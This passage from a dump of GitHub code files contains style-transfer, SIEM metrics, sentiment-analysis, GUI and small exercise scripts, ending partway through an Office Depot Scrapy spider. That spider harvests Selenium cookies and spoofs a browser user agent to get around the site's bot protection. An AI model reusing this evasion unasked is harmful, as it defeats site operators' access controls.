name='insurance_delete'),\n]","repo_name":"lolo19950603/debtcollector","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27966998346","text":"import numpy as np\r\nimport time\r\nimport scipy\r\nfrom PIL import Image\r\nfrom os import listdir, mkdir, getcwd\r\nfrom keras.applications.vgg16 import VGG16\r\nfrom keras import backend as K\r\n\r\n# model weights and constants\r\nContent_weight = 0.021\r\nstyle_weight = 7.6\r\ntotal_variation_weight = 1.5\r\niterations = 9\r\n\r\nlimit = 420 # limit the size of images\r\nheight = limit\r\nwidth = limit\r\n\r\n# loss functions\r\ndef Content_loss(Content, whole):\r\n return K.sum(K.square(whole - Content))\r\n\r\ndef gram_matrix(x):\r\n features = K.batch_flatten(K.permute_dimensions(x, (2, 0, 1)))\r\n gram = K.dot(features, K.transpose(features))\r\n return gram\r\n\r\ndef style_loss(style, whole):\r\n S = gram_matrix(style)\r\n C = gram_matrix(whole)\r\n channels = 3\r\n size = height * width\r\n return K.sum(K.square(S - C)) / (4. 
* (channels ** 2) * (size ** 2))\r\n\r\ndef total_variation_loss(x):\r\n a = K.square(x[:, :width-1, :height-1, :] - x[:, 1:, :height-1, :])\r\n b = K.square(x[:, :width-1, :height-1, :] - x[:, :width-1, 1:, :])\r\n return K.sum(K.pow(a + b, 1.25))\r\n\r\ndef total_loss(model, whole_image):\r\n loss = K.variable(0.)\r\n\r\n layers = dict([(layer.name, layer.output) for layer in model.layers])\r\n layer_features = layers['block1_conv2'] # Content loss layers\r\n Content_image_features = layer_features[0, :, :, :]\r\n whole_features = layer_features[2, :, :, :]\r\n # Content loss\r\n loss += Content_weight * Content_loss(Content_image_features,\r\n whole_features)\r\n # style loss layers\r\n feature_layers = ['block1_conv2', 'block2_conv2',\r\n 'block3_conv3', 'block4_conv3',\r\n 'block5_conv3']\r\n\r\n for layer_name in feature_layers:\r\n layer_features = layers[layer_name]\r\n style_features = layer_features[1, :, :, :]\r\n whole_features = layer_features[2, :, :, :]\r\n sl = style_loss(style_features, whole_features)\r\n loss += (style_weight / len(feature_layers)) * sl\r\n\r\n # total variation loss\r\n loss += total_variation_weight * total_variation_loss(whole_image)\r\n return loss # total loss\r\n\r\n\r\ndef eval_loss_and_grads(x):\r\n x = x.reshape((1, width, height, 3))\r\n outputs = [loss]\r\n outputs += grads\r\n f_outputs = K.function([whole_array], outputs)\r\n outs = f_outputs([x])\r\n loss_value = outs[0]\r\n grad_values = outs[1].flatten().astype('float64')\r\n return loss_value, grad_values\r\n\r\ndef minimize_loss(whole):\r\n x = np.random.uniform(0, 255, (1, width, height, 3)) - 128\r\n evaluator = Evaluator()\r\n\r\n print(\"\\n\\nProcessing: \" + whole)\r\n for i in range(iterations):\r\n\r\n # print diagnostic information\r\n print('Start of iteration', i)\r\n start_time = time.time()\r\n x, min_val, info = scipy.optimize.fmin_l_bfgs_b(evaluator.loss,\r\n x.flatten(),\r\n fprime=evaluator.grads,\r\n maxfun=20)\r\n print('Current loss value:', min_val)\r\n end_time = time.time()\r\n print('Iteration %d completed in %ds' % (i, end_time - start_time))\r\n return x\r\n\r\n# Evaluator class\r\nclass Evaluator(object):\r\n def __init__(self):\r\n self.loss_value = None\r\n self.grads_values = None\r\n\r\n def loss(self, x):\r\n assert self.loss_value is None\r\n loss_value, grad_values = eval_loss_and_grads(x)\r\n self.loss_value = loss_value\r\n self.grad_values = grad_values\r\n return self.loss_value\r\n\r\n def grads(self, x):\r\n assert self.loss_value is not None\r\n grad_values = np.copy(self.grad_values)\r\n self.loss_value = None\r\n self.grad_values = None\r\n return grad_values\r\n\r\n# util functions\r\n\r\ndef convert_to_image(img_array):\r\n img_array = img_array.reshape((width, height, 3)) # reshape\r\n img_array = img_array[:, :, ::-1]\r\n img_array[:, :, 0] += 103.939\r\n img_array[:, :, 1] += 116.779\r\n img_array[:, :, 2] += 123.68\r\n img_array = np.clip(img_array, 0, 255).astype('uint8')\r\n\r\n return Image.fromarray(img_array) # return image\r\n\r\ndef prelim_img_process(image):\r\n image = image.resize((height, width), Image.ANTIALIAS) # resize\r\n image = np.asarray(image, dtype='float32') # cast to np array\r\n image = np.expand_dims(image, axis=0) # add placeholder dimension\r\n\r\n image = image[:,:,:,:3] # remove alpha chanel\r\n image[:, :, :, 0] -= 103.939 # RGB values obtained from ImageNet\r\n image[:, :, :, 1] -= 116.779\r\n image[:, :, :, 2] -= 123.68\r\n image = image[:, :, :, ::-1]\r\n return image\r\n\r\ndef search_img_names():\r\n 
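# assumes ContentImages/ and styleImages/ folders exist in the current working directory\r\n    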
all_Content_names = listdir(\"ContentImages\")\r\n all_style_names = listdir(\"styleImages\")\r\n return all_Content_names, all_style_names\r\n\r\ndef search_Content_img(name):\r\n image = Image.open('./ContentImages/' + str(name)\r\n ) # search the Content image\r\n # change the global variable to fit center image\r\n global height,width\r\n width = image.size[1]\r\n height = image.size[0]\r\n # compress\r\n if(height>limit or width>limit):\r\n if(height>width):\r\n ratio = height/limit\r\n else:\r\n ratio = width/limit\r\n height = int(height/ratio)\r\n width = int(width/ratio)\r\n\r\n image = prelim_img_process(image)\r\n return image\r\n\r\ndef search_style_img(name):\r\n image = Image.open('./styleImages/' + str(name)\r\n ) # search the style image\r\n\r\n # rotate style image to minimize the loss on style images\r\n if (image.size != (width,height)\r\n and (image.size[1] >= image.size[0]) != (height >= width)):\r\n image = image.rotate(90) # rotate style-image\r\n\r\n image = prelim_img_process(image)\r\n return image\r\n#-----------------------------------------------------------------------------\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # search all images references\r\n Content_names, style_names = search_img_names()\r\n\r\n # process each Content image\r\n for Content_name in Content_names:\r\n # create intermediate directory associated output\r\n mkdir('./outputImages/' + Content_name[:-4])\r\n content_images = search_Content_img(Content_name)\r\n\r\n # create all style wholes for the current Content image\r\n for style_name in style_names:\r\n style_images = search_style_img(style_name)\r\n\r\n # create whole name and save destination\r\n whole = Content_name[:-4] + style_name[:-4]\r\n save_dir = getcwd() + '/outputImages/' + \\\r\n Content_name[:-4] + '/' + whole\r\n\r\n # create placeholder image, used to store merger image\r\n whole_array = K.placeholder((1, width,height, 3))\r\n\r\n # concatenate the image arrays\r\n input_tensor = K.concatenate([content_images,\r\n style_images,\r\n whole_array], axis=0)\r\n\r\n # load model, iteratively merge and consolidate the two images\r\n # load the model\r\n model = VGG16(input_tensor=input_tensor,\r\n weights='imagenet', include_top=False)\r\n # calculate whole loss\r\n loss = total_loss(model, whole_array)\r\n # calculate gradients of generated image\r\n grads = K.gradients(loss, whole_array)\r\n # run optimization using previously calculated loss values\r\n x = minimize_loss(whole)\r\n # convert and finalize np array\r\n final = convert_to_image(x)\r\n # save final rendition appropriately\r\n final.save(save_dir + '.jpeg', \"jpeg\")","repo_name":"Explorerhpx/Course-Project_Machine-Learning","sub_path":"Final Project/code/question2/sybthesis.py","file_name":"sybthesis.py","file_ext":"py","file_size_in_byte":7748,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"37802988655","text":"import requests\n\n\ndef get_eps(siem_address='localhost'):\n raw_addr = f'http://{siem_address}:8013/events/counter/simple?name=storage.events_raw.in&granularity=300' \\\n f'&aggregation=avg'\n norm_addr = f'http://{siem_address}:8013/events/counter/simple?name=storage.events_norm.in&granularity=300' \\\n f'&aggregation=avg'\n corr_in_addr = f'http://{siem_address}:8013/events/counter/simple?name=correlator.events.in&granularity=300' \\\n f'&aggregation=avg'\n corr_out_addr = f'http://{siem_address}:8013/events/counter/simple?name=correlator.events.out&granularity=300' \\\n 
f'&aggregation=avg'\n parsed_string_r = round(requests.get(url=raw_addr).json().get('count')[0])\n parsed_string_n = round(requests.get(url=norm_addr).json().get('count')[0])\n parsed_string_ci = round(requests.get(url=corr_in_addr).json().get('count')[0])\n parsed_string_co = round(requests.get(url=corr_out_addr).json().get('count')[0])\n\n keys_list = ['raw_eps', 'norm_eps', 'corr_in', 'corr_out']\n metric_list = [parsed_string_r, parsed_string_n, parsed_string_ci, parsed_string_co]\n new_list = dict(zip(keys_list, metric_list))\n\n return new_list\n\n\ndef get_siem_tables(siem_address='localhost'):\n tables_request = f'http://{siem_address}:8013/v2/control/tables'\n req = requests.get(tables_request).json()\n return req\n","repo_name":"GenRockeR/mpsiemlib","sub_path":"examples/mpsiem_exporter/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"68"} +{"seq_id":"73948761497","text":"class Solution:\n def majorityElement(self, nums: List[int]) -> List[int]:\n cnt = {}\n hashset = set()\n ans = []\n for num in nums:\n cnt[num] = cnt.get(num,0)+1\n if cnt[num] > len(nums)//3 and num not in hashset:\n ans.append(num)\n hashset.add(num)\n return ans","repo_name":"Daniel-W1/Competitive-Programming","sub_path":"229-majority-element-ii/229-majority-element-ii.py","file_name":"229-majority-element-ii.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"26233729125","text":"# 2. Создать список, состоящий из кубов нечётных чисел от 1 до 1000\r\n# (куб X - третья степень числа X):\r\n# Вычислить сумму тех чисел из этого списка, сумма цифр которых делится\r\n# нацело на 7. Например, число «19 ^ 3 = 6859» будем включать в сумму,\r\n# так как 6 + 8 + 5 + 9 = 28 – делится нацело на 7. Внимание: использовать\r\n# только арифметические операции!\r\n# К каждому элементу списка добавить 17 и заново вычислить сумму тех чисел\r\n# из этого списка, сумма цифр которых делится нацело на 7.\r\n# * Решить задачу под пунктом b, не создавая новый список.\r\n#\r\n\r\nx = 1\r\nten = 10\r\nhund = ten ** 2\r\nthous = ten ** 3\r\nten_thous = ten ** 4\r\nhund_thous = ten ** 5\r\nall_sum = 0\r\n\r\nwhile x % 2 and x < 1000:\r\n # print('Степень', x ** 3)\r\n degree = x ** 3\r\n sum_degree = (degree // hund_thous +\r\n degree % hund_thous // ten_thous +\r\n degree % hund_thous % ten_thous // thous +\r\n degree % hund_thous % ten_thous % thous // hund +\r\n degree % hund_thous % ten_thous % thous % hund // ten +\r\n degree % ten)\r\n # print('Сумма', sum_degree)\r\n if not sum_degree % 7:\r\n all_sum = all_sum + sum_degree\r\n # else:\r\n # print(all_sum )\r\n x = x + 2\r\nprint(all_sum)\r\n","repo_name":"Lex-G357/Test","sub_path":"task_1_2.py","file_name":"task_1_2.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19634747556","text":"import operator\n\nimport hiero.ui\nimport hiero.core\nfrom PySide2.QtGui import QFont, QIcon, QColor, QFontMetrics\nfrom PySide2.QtCore import (Qt, QSize, QPoint, QModelIndex, QAbstractItemModel,\n QAbstractTableModel, QSortFilterProxyModel)\nfrom PySide2.QtWidgets import (QWidget, QToolTip, QTableView, QHBoxLayout,\n QHeaderView, QPushButton, QSizePolicy,\n QVBoxLayout, QApplication, QAbstractItemView)\n\nfrom . 
import config\nfrom .connectionmanager import ConnectionState, ConnectionManager\n\n\nclass _Columns:\n \"\"\" Columns present in the table model. \"\"\"\n\n color = 0\n \"\"\" Participant's color. \"\"\"\n\n participant = 1\n \"\"\" Participant's name. \"\"\"\n\n status = 2\n \"\"\" Participant's connection status. \"\"\"\n\n size = 3\n \"\"\" Number of columns in the table. \"\"\"\n\n\n_participantsHeaderFormat = 'Participants ({})'\n\n\nclass _Participant:\n \"\"\" Holds the data of a participant in the table model. \"\"\"\n\n def __init__(self, clientId, name, color, status):\n self.clientId = clientId\n self.name = name\n self.color = QColor(color[0], color[1], color[2], 255)\n self.status = status\n\n\nclass _SyncReviewStatusModel(QAbstractTableModel):\n \"\"\" Data model for the data of the participants in the current sync review session. \"\"\"\n\n def __init__(self, view):\n QAbstractTableModel.__init__(self)\n self._view = view\n # List of _Participant instances.\n self._data = list()\n self._clientDataProvider = None\n\n def _updateClientData(self, clientData):\n self.beginResetModel()\n\n # Keep known participants that are no longer connected as offline.\n self._data = [_Participant(p.clientId, p.name, (p.color.red(), p.color.green(), p.color.blue()), False) for p in self._data if\n p.clientId not in clientData]\n\n # Add new clients as connected participants. Update existing participant data.\n for clientId, clientData in clientData.items():\n name, color = clientData\n self._data.append(_Participant(clientId, name, color, True))\n\n self.endResetModel()\n\n def _clientDataChanged(self):\n self._updateClientData(self._clientDataProvider.clientData)\n\n def _clearClientData(self):\n self._data = list()\n self._updateClientData(dict())\n\n def rowCount(self, parent):\n if parent.isValid():\n return 0\n return len(self._data)\n\n def columnCount(self, parent):\n if parent.isValid():\n return 0\n return _Columns.size\n\n def headerData(self, section, orientation, role):\n global _participantsHeaderFormat\n data = None\n\n if orientation != Qt.Orientation.Horizontal:\n return data\n\n if role == Qt.DisplayRole:\n if section == _Columns.participant:\n data = _participantsHeaderFormat.format(len(self._data))\n elif section == _Columns.status:\n data = 'Status'\n elif role == Qt.DecorationRole:\n if section == _Columns.color:\n return QIcon('icons:SyncParticipants.png')\n\n return data\n\n def data(self, index, role):\n if not index.isValid():\n return None\n\n data = None\n participant = self._data[index.row()]\n column = index.column()\n if role == Qt.DisplayRole:\n if column == _Columns.participant:\n data = participant.name\n elif column == _Columns.status:\n if (participant.clientId == config.HOST_ID):\n data = 'Host'\n else:\n data = 'Connected' if participant.status else 'Offline'\n elif role == Qt.DecorationRole:\n if column == _Columns.color:\n # ToDo Use a colorized icon instead of a color square.\n data = participant.color\n\n return data\n\n def enterSession(self, clientDataProvider):\n self._clientDataProvider = clientDataProvider\n self._clientDataProvider.clientDataChanged.connect(self._clientDataChanged)\n self._clientDataProvider.clientDataCleared.connect(self._clearClientData)\n self._clientDataChanged()\n\n def leaveSession(self):\n if self._clientDataProvider is not None:\n self._clientDataProvider.clientDataChanged.disconnect(self._clientDataChanged)\n self._clientDataProvider.clientDataCleared.disconnect(self._clearClientData)\n self._clientDataProvider = 
None\n\n\ndef _colorHeaderMinWidth():\n # ToDo use the width of the icon.\n return 32\n\n\ndef _participantsHeaderMinWidth():\n # Size of the selected header showing a 3-digit number of participants plus an estimated size for the sort indicator.\n return QFontMetrics(QFont()).width(_participantsHeaderFormat.format(888)) + 32\n\n\nclass SyncStatusPanel(QWidget):\n \"\"\" Shows the current status of the participants of a sync review session. \"\"\"\n\n def __init__(self, connectionManager):\n QWidget.__init__(self)\n self._connectionManager = connectionManager\n\n self.setObjectName('uk.co.thefoundry.syncreviewstatus.1')\n self.setWindowTitle('Sync Session')\n self.setWindowIcon(QIcon('icons:SyncTab.png'))\n\n # Last column used for sorting the table. Used for disabling clicking on the color header for sorting.\n self._lastSortedColumn = -1\n # Last sort order used. Used for disabling clicking on the color header for sorting.\n self._lastSortedOrder = None\n\n # Models used by the window.\n self._model = _SyncReviewStatusModel(self)\n\n # Toolbar widgets.\n # The buttons' labels and actions and icons are set up by _updateConnectionState.\n self._hostButton = QPushButton('')\n self._hostAction = None\n self._connectButton = QPushButton('')\n self._connectButton.setToolTip(config.CONNECT_BUTTON_TOOL_TIP)\n self._connectAction = None\n\n # Create the push session button.\n pushIcon = QIcon('icons:SyncPush.png')\n pushIcon.addFile('icons:SyncPush_disabled.png', QSize(), QIcon.Disabled)\n self._pushSessionButton = QPushButton(pushIcon, '')\n self._pushSessionButton.setMaximumHeight(24)\n self._pushSessionButton.setToolTip(config.PUSH_SESSION_TOOL_TIP)\n self._pushSessionButton.clicked.connect(connectionManager.pushSession)\n self._pushSessionButton.setFocusPolicy(Qt.NoFocus)\n\n # Create the push session button.\n connectInfoIcon = QIcon('icons:SyncCopyInfo.png')\n connectInfoIcon.addFile('icons:SyncCopyInfo_disabled.png',\n QSize(), QIcon.Disabled)\n self._copyConnectionInfoButton = QPushButton(connectInfoIcon, '')\n self._copyConnectionInfoButton.setMaximumHeight(24)\n self._copyConnectionInfoButton.setToolTip(config.COPY_INFO_TOOL_TIP)\n self._copyConnectionInfoButton.clicked.connect(self._copyConnectionInfo)\n self._copyConnectionInfoButton.setFocusPolicy(Qt.NoFocus)\n\n # Toolbar setup.\n toolbarLayout = QHBoxLayout()\n toolbarLayout.setAlignment(Qt.AlignLeft)\n toolbarLayout.setContentsMargins(5, 5, 5, 0)\n toolbarLayout.addWidget(self._hostButton)\n toolbarLayout.addWidget(self._connectButton)\n toolbarLayout.addWidget(self._copyConnectionInfoButton)\n toolbarLayout.addWidget(self._pushSessionButton)\n\n # Main view.\n self._tableView = QTableView()\n self._sortModel = QSortFilterProxyModel()\n self._sortModel.setSourceModel(self._model)\n self._tableView.setModel(self._sortModel)\n # Disable the vertical header.\n self._tableView.verticalHeader().setVisible(False)\n # Set the sizes of each column on the horizontal header.\n self._tableView.setColumnWidth(_Columns.color, _colorHeaderMinWidth())\n self._tableView.setColumnWidth(\n _Columns.participant, _participantsHeaderMinWidth())\n self._tableView.horizontalHeader().setStretchLastSection(True)\n # Table style.\n self._tableView.setGridStyle(Qt.NoPen)\n self._tableView.setAlternatingRowColors(True)\n # Disable selection.\n self._tableView.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self._tableView.setFocusPolicy(Qt.NoFocus)\n self._tableView.setSelectionMode(QAbstractItemView.NoSelection)\n # Table sorting.\n 
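# Sorting is performed by the QSortFilterProxyModel wrapped around the data model above, so the underlying participant list itself is never reordered.\n 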
self._tableView.setSortingEnabled(True)\n # Do not show a sort indicator on launch.\n self._setUnsorted()\n\n # Disable clicking on the color header for sorting.\n self._tableView.horizontalHeader().sortIndicatorChanged.connect(self._ignoreClicksOnColorHeader)\n\n # Main layout configuration.\n mainLayout = QVBoxLayout()\n mainLayout.addLayout(toolbarLayout)\n mainLayout.addWidget(self._tableView)\n self.setLayout(mainLayout)\n\n # Connection state\n self._updateConnectionState(ConnectionState.DISCONNECTED)\n connectionManager.connectionState.changed.connect(self._updateConnectionState)\n\n def getSortedColumn(self):\n \"\"\" Column that is currently being sorted. Holds a negative value if the table is currently not sorted. \"\"\"\n return self._lastSortedColumn\n\n def getSortedOrder(self):\n \"\"\" Current sort order. If getSortedColumn is negative, it will return None. \"\"\"\n return self._lastSortedOrder\n\n def _setUnsorted(self):\n # After calling this method no sort indicator will be shown and the model will return to its natural, unsorted\n # order.\n self._lastSortedColumn = -1\n self._tableView.horizontalHeader().setSortIndicator(\n self._lastSortedColumn, Qt.SortOrder.AscendingOrder)\n\n def _ignoreClicksOnColorHeader(self, newSortedColumn, _):\n if newSortedColumn == _Columns.color:\n # If the user clicked on the color header, restore the sort indicator status from before the click.\n if self._lastSortedColumn in (_Columns.participant, _Columns.status):\n self._tableView.horizontalHeader().setSortIndicator(\n self._lastSortedColumn, self._lastSortedOrder)\n else:\n self._setUnsorted()\n else:\n # Store the sort indicator status for the next click.\n self._lastSortedColumn = newSortedColumn\n if newSortedColumn != -1:\n self._lastSortedOrder = self._tableView.horizontalHeader().sortIndicatorOrder()\n\n def _updateHostButton(self, state):\n self._hostButton.setText(\n 'Host' if state != ConnectionState.SERVER_RUNNING else 'End Session')\n self._hostButton.setToolTip(config.HOST_BUTTON_TOOL_TIP if state !=\n ConnectionState.SERVER_RUNNING else config.END_SESSION_BUTTON_TOOL_TIP)\n self._hostButton.setEnabled(\n state in (ConnectionState.DISCONNECTED, ConnectionState.SERVER_RUNNING))\n if self._hostAction is not None:\n self._hostButton.pressed.disconnect(self._hostAction)\n\n hostActionName = 'foundry.application.{}'.format(\n 'hostSession' if state != ConnectionState.SERVER_RUNNING else 'endSession')\n self._hostAction = hiero.ui.findMenuAction(hostActionName).trigger\n self._hostButton.pressed.connect(self._hostAction)\n\n def _updateConnectButton(self, state):\n self._connectButton.setText(\n 'Connect' if state != ConnectionState.CLIENT_CONNECTED else 'Disconnect')\n self._connectButton.setEnabled(\n state in (ConnectionState.DISCONNECTED, ConnectionState.CLIENT_CONNECTED))\n if self._connectAction is not None:\n self._connectButton.pressed.disconnect(self._connectAction)\n\n connectActionName = 'foundry.application.{}'.format(\n 'connectSession' if state != ConnectionState.CLIENT_CONNECTED else 'disconnectSession')\n self._connectAction = hiero.ui.findMenuAction(connectActionName).trigger\n self._connectButton.pressed.connect(self._connectAction)\n\n def _updateConnectionState(self, state):\n self._updateHostButton(state)\n self._updateConnectButton(state)\n self._copyConnectionInfoButton.setEnabled(state == ConnectionState.SERVER_RUNNING)\n self._pushSessionButton.setEnabled(\n state in (ConnectionState.SERVER_RUNNING, ConnectionState.CLIENT_CONNECTED))\n if state == 
ConnectionState.DISCONNECTED:\n self._model.leaveSession()\n elif state in (ConnectionState.SERVER_RUNNING, ConnectionState.CLIENT_CONNECTED):\n self._model.enterSession(self._connectionManager.session.clientDataProvider())\n\n def _copyConnectionInfo(self):\n \"\"\" Copies the connection info of the server into the clipboard. \"\"\"\n connectionInfo = self._connectionManager.getConnectionInfo()\n if connectionInfo:\n QApplication.clipboard().setText(connectionInfo)\n toolTipPosition = self.mapToGlobal(self._copyConnectionInfoButton.pos())\n # Adjust tooltip position so it doesn't cover the button\n toolTipPosition += QPoint(0, 10)\n QToolTip.showText(toolTipPosition,\n 'Connection info successfully copied to clipboard',\n self._copyConnectionInfoButton,\n self._copyConnectionInfoButton.rect(),\n 3000)\n\n\n# Global instance of the sync review status panel.\n_statusPanelInstance = None\n\n\ndef initialise(connectionManager):\n \"\"\" Initialize the global instance of the sync review status panel. \"\"\"\n global _statusPanelInstance\n try:\n _statusPanelInstance = SyncStatusPanel(connectionManager)\n hiero.ui.windowManager().addWindow(_statusPanelInstance)\n except Exception as ex:\n print('Initialization of the sync review status panel failed: {}'.format(ex))\n\n\ndef openStatusPanelIfClosed():\n \"\"\" Opens the status panel in a floating window if it's closed and the user preference is to open\n it on session startup\"\"\"\n if (not _statusPanelInstance):\n return\n\n settings = hiero.core.ApplicationSettings()\n if (not _statusPanelInstance.isVisible() and settings.boolValue(config.OPEN_PANEL_ON_STARTUP_KEY)):\n hiero.ui.windowManager().popupWindow(_statusPanelInstance)\n","repo_name":"sisoe24/nuke-python-stubs","sub_path":"stubs/hiero/syncreview/syncreviewstatuspanel.py","file_name":"syncreviewstatuspanel.py","file_ext":"py","file_size_in_byte":14458,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"68"} +{"seq_id":"69986266778","text":"from pysentimiento import create_analyzer\n\n# Create sentiment, emotion and hate speech analyzers in Spanish\nsentiment_analyzer = create_analyzer(task=\"sentiment\", lang=\"es\")\nemotion_analyzer = create_analyzer(task=\"emotion\", lang=\"es\")\nhate_speech_analyzer = create_analyzer(task=\"hate_speech\", lang=\"es\")\n\ndef analyze_text(text):\n sentiment_output = sentiment_analyzer.predict(text)\n emotion_output = emotion_analyzer.predict(text)\n hate_speech_output = hate_speech_analyzer.predict(text)\n\n sentiment_values = sentiment_output.probas\n emotion_values = emotion_output.probas\n hate_speech_values = hate_speech_output.probas\n\n return sentiment_values, emotion_values, hate_speech_values\n\ns, e, h = analyze_text(\"hoy me desperté sintiéndome genial\")\nprint(s, e, h)","repo_name":"joacoponfe/Modos_App","sub_path":"public/assets/python/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"5070261727","text":"import tkinter as tk\n\n\nclass StartPage(tk.Frame):\n def donothing(self):\n filewin = tk.Toplevel(self.master)\n button = tk.Button(filewin, text=\"Do nothing button\")\n button.pack()\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n heading = tk.Label(\n self,\n bg=\"white\",\n fg=\"black\",\n text='Tugas Akhir',\n font='none 24 bold'\n )\n heading.place(relx=0.5, rely=0.1, 
anchor=tk.CENTER)\n\n text_elements = [\n \"Memasukkan Pesan ke Gambar\",\n \"Mengekstraksi Pesan dari Gambar\",\n \"Confidentiality Pesan\",\n \"Recovery Pesan\"\n ]\n\n command_elements = [\n lambda: controller.show_frame(\"ImageInsertionForm\"),\n lambda: controller.show_frame(\"ImageExtractForm\"),\n lambda: controller.show_frame(\"ImageExtractFormnoAES\"),\n lambda: controller.show_frame(\"ImageRecoveryForm\"),\n ]\n\n index = 0\n for text in text_elements:\n button = tk.Button(\n self,\n bg='white',\n fg='black',\n text=text,\n command=command_elements[index],\n width=50,\n height=2\n )\n button.place(relx=0.5, rely=0.1*(index+2), anchor=tk.CENTER)\n index += 1\n","repo_name":"muharisfebriansyah/TugasAkhir","sub_path":"src/gui/pages/start_page.py","file_name":"start_page.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"73604399577","text":"from __future__ import division, absolute_import, unicode_literals\n\nimport json\nimport re\nimport time\nimport socket\nimport urlparse\nimport urllib\nimport os\nimport string\n\nfrom scrapy import Request\n\nfrom product_ranking.items import SiteProductItem, RelatedProduct, Price, \\\n BuyerReviews\nfrom product_ranking.spiders import BaseProductsSpider, cond_set, \\\n cond_set_value\nfrom product_ranking.br_bazaarvoice_api_script import BuyerReviewsBazaarApi\n\nfrom datetime import datetime\n\nis_empty =lambda x,y=None: x[0] if x else y\n\n\ndef is_num(s):\n try:\n int(s.strip())\n return True\n except ValueError:\n return False\n\n\nclass OfficedepotProductsSpider(BaseProductsSpider):\n name = 'officedepot_products'\n allowed_domains = [\"officedepot.com\", \"www.officedepot.com\", 'bazaarvoice.com']\n start_urls = []\n _extra_requests = False\n # settings = DockersValidatorSettings\n\n SEARCH_URL = \"http://www.officedepot.com/catalog/search.do?Ntt={search_term}&searchSuggestion=true&akamai-feo=off\"\n\n PAGINATE_URL = ('http://www.officedepot.com/catalog/search.do?Ntx=mode+matchpartialmax&Nty=1&Ntk=all'\n '&Ntt={search_term}&N=5&recordsPerPageNumber=24&No={nao}'\n )\n\n CURRENT_NAO = 0\n PAGINATE_BY = 24 # 24 products\n TOTAL_MATCHES = None # for pagination\n\n REVIEW_URL = \"http://officedepot.ugc.bazaarvoice.com/2563\" \\\n \"/{product_id}/reviews.djs?format=embeddedhtml\"\n\n VARIANTS_URL = 'http://www.officedepot.com/mobile/getSkuAvailable' \\\n 'Options.do?familyDescription={name}&sku={sku}&noLogin=true'\n QA_URL = \"http://officedepot.ugc.bazaarvoice.com/answers/2563/product/{product_id}/questions.djs?format=embeddedhtml\"\n #\n # RELATED_PRODUCT = \"http://www.res-x.com/ws/r2/Resonance.aspx?\" \\\n # \"appid=dockers01&tk=187015646137297\" \\\n # \"&ss=182724939426407\" \\\n # \"&sg=1&\" \\\n # \"&vr=5.3x&bx=true\" \\\n # \"&sc=product4_rr\" \\\n # \"&sc=product3_rr\" \\\n # \"&sc=product1_r\" \\\n # \"r&sc=product2_rr\" \\\n # \"&ev=product&ei={product_id}\" \\\n # \"&no=20\" \\\n # \"&language=en_US\" \\\n # \"&cb=certonaResx.showResponse\" \\\n # \"&ur=http%3A%2F%2Fwww.levi.com%2FUS%2Fen_US%\" \\\n # \"2Fwomens-jeans%2Fp%2F095450043&plk=&\"\n\n\n def __init__(self, *args, **kwargs):\n self.br = BuyerReviewsBazaarApi(called_class=self)\n # officedepot seems to have a bot protection, so we first get the cookies\n # and parse the site with them after that\n self.proxy = None\n self.timeout = 60\n self.width = 1024\n self.height = 768\n self.selenium_cookies = {}\n self.user_agent = ('Mozilla/5.0 (Windows NT 6.1; WOW64) 
AppleWebKit/537.36'\n ' (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36')\n socket.setdefaulttimeout(60)\n self._get_selenium_cookies_for_main_page()\n if kwargs.get('scrape_variants_with_extra_requests'):\n self._extra_requests = True\n super(OfficedepotProductsSpider, self).__init__(\n site_name=self.allowed_domains[0], *args, **kwargs)\n\n def _prepare_driver(self, driver):\n driver.set_page_load_timeout(int(self.timeout))\n driver.set_script_timeout(int(self.timeout))\n driver.set_window_size(int(self.width), int(self.height))\n\n def _get_selenium_cookies_for_main_page(self):\n from pyvirtualdisplay import Display\n display = Display(visible=False)\n display.start()\n driver = self._init_chromium()\n self._prepare_driver(driver)\n try:\n driver.get('http://' + self.allowed_domains[0])\n time.sleep(10)\n for cookie in driver.get_cookies():\n self.selenium_cookies[cookie['name']] = cookie['value']\n driver.quit()\n except Exception as e:\n driver.quit()\n time.sleep(10)\n self.log('Error getting cookies from homepage, trying one more time: %s' % str(e))\n driver.get('http://' + self.allowed_domains[0])\n time.sleep(10)\n for cookie in driver.get_cookies():\n self.selenium_cookies[cookie['name']] = cookie['value']\n try:\n driver.quit()\n display.stop()\n except Exception as e:\n self.log('Error on driver & display destruction: %s' % str(e))\n\n def _init_chromium(self):\n from selenium import webdriver\n from selenium.webdriver.remote.remote_connection import RemoteConnection\n RemoteConnection.set_timeout(30)\n chrome_flags = webdriver.DesiredCapabilities.CHROME # this is for Chrome?\n chrome_options = webdriver.ChromeOptions() # this is for Chromium\n if self.proxy:\n chrome_options.add_argument(\n '--proxy-server=%s' % self.proxy_type+'://'+self.proxy)\n chrome_flags[\"chrome.switches\"] = ['--user-agent=%s' % self.user_agent]\n chrome_options.add_argument('--user-agent=%s' % self.user_agent)\n executable_path = '/usr/sbin/chromedriver'\n if not os.path.exists(executable_path):\n executable_path = '/usr/local/bin/chromedriver'\n # initialize webdriver, open the page and make a screenshot\n driver = webdriver.Chrome(desired_capabilities=chrome_flags,\n chrome_options=chrome_options,\n executable_path=executable_path)\n return driver\n\n def _init_firefox(self):\n from selenium import webdriver\n from selenium.webdriver.remote.remote_connection import RemoteConnection\n RemoteConnection.set_timeout(30)\n profile = webdriver.FirefoxProfile()\n profile.set_preference(\"general.useragent.override\", 